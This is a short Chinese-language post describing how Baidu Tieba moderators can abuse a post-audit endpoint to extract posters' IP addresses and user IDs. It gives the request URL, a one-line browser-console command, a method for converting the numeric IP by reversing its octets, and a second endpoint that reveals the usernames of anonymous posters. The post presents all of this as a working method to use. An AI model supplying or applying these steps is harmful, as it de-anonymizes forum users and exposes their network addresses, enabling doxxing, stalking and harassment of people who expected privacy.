贴吧贴子管理工具漏洞所需权限:任意贴吧小吧主,大吧主漏洞使用所需资料:被查询人的贴子地址,请对照楼层。(楼中楼无法查询)漏洞使用方法:
http://tieba.baidu.com/bawu2/postaudit/pblist?kw=“您所管理的吧名”&tid=“您需查询的贴子编号”&size=99&ie=utf-8使用Chrome 和 Webkit 内核浏览器,填写相应信息并访问以上网址。在打开的网页中,按下F12,在“Console”中复制以下代码并回车执行;C=JSON.parse(document.body.innerText);C此时可按楼层对照寻找用户的IP和UID等详细信息。查看IP,请通过电脑的 ping UIP数值,得到一串IP,并将其分段倒序排列例如:3.0.168.192 转换为 192.168.0.3即为被查询人IP。查看相应贴子匿名用户的用户名,请通过该入口进行:
http://tieba.baidu.com/i/sys/user_json?uid=数字